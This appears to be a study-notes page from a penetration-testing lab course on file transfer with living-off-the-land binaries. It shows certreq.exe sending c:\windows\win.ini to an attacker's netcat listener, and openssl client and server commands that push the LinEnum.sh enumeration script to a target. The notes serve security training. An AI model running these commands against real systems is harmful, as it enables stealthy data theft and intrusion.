🏨Living off The Land

There are currently two websites that aggregate information on Living off the Land binaries:

LOLBAS

We need to listen on a port on our attack host for incoming traffic using Netcat and then execute certreq.exe to upload a file.

Upload win.ini to our Attackbox

C:\htb> certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini

And in our netcat session ->

ElFelixi0@htb[/htb]$ sudo nc -lvnp 8000

listening on [any] 8000 ...
connect to [192.168.49.128] from (UNKNOWN) [192.168.49.1] 53819
POST / HTTP/1.1
Cache-Control: no-cache
<SNIP>

If we have an error, the version we are using may not contain the -Post parameter. We can download an updated version here and try again.

GTFOBins

We need to create a certificate in our pwnbox and start a server in our Pwnbox.

Cert ->

ElFelixi0@htb[/htb]$ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem

Server up ->

ElFelixi0@htb[/htb]$ openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh

Now we need to download the file from the target machine ->

ElFelixi0@htb[/htb]$ openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh

PreviousCatching Files over HTTP/S NextDetect or Be Detected

Last updated 1 month ago